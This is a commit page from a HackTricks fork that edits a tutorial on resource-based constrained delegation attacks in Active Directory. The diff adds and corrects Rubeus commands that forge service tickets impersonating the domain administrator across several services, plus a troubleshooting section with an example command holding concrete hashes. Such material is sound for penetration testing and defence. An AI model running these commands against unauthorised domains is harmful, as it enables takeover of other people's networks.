coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [master] one page modified

Browse Source
This commit is contained in:
CPol 2021-01-04 10:44:22 +00:00 committed by gitbook-bot
parent 7df6e7df6d
commit 5ecad1971c
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 13 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
windows/active-directory-methodology/resource-based-constrained-delegation.md
View File

@ -66,7 +66,7 @@ Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount
First of all, we created the new Computer object with the password `123456`, so we need the hash of that password:
```bash
.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER /domain:domain.local
.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local
```
This will print the RC4 and AES hashes for that account.
@ -78,6 +78,12 @@ rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:admin
![](../../.gitbook/assets/b3.png)
You can generate more tickets just asking once using the `/altservice` param of Rubeus:
```bash
> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:cifs,time,host,http,winrm,rpcss,ldap /domain:domain.local /ptt
```
### Accessing
The last command line will perform the **complete S4U attack and will inject the TGS** from Administrator to the victim host in **memory**.
@ -89,6 +95,12 @@ ls \\victim.domain.local\C$
![](../../.gitbook/assets/b4.png)
## Kerberos Errors
* **`KDC_ERR_ETYPE_NOTSUPP`**: This means that kerberos is configured to not use DES or RC4 and you are supplying just the RC4 hash. Supply to Rubeus at least the AES256 hash \(or just supply it the rc4, aes128 and aes256 hashes\). Example: `[Rubeus.Program]::MainString("s4u /user:FAKECOMPUTER /aes256:CC648CF0F809EE1AA25C52E963AC0487E87AC32B1F71ACC5304C73BF566268DA /aes128:5FC3D06ED6E8EA2C9BB9CC301EA37AD4 /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:CIFS/M3DC.M3C.LOCAL /ptt".split())`
* **`KRB_AP_ERR_SKEW`**: This means that the time of the current computer is different from the one of the DC and kerberos is not working properly.
* **`preauth_failed`**: This means that the given username + hashes aren't working to login. You may have forgotten to put the "$" inside the username when generating the hashes \(`.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local`\)
## References
{% embed url="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html" %}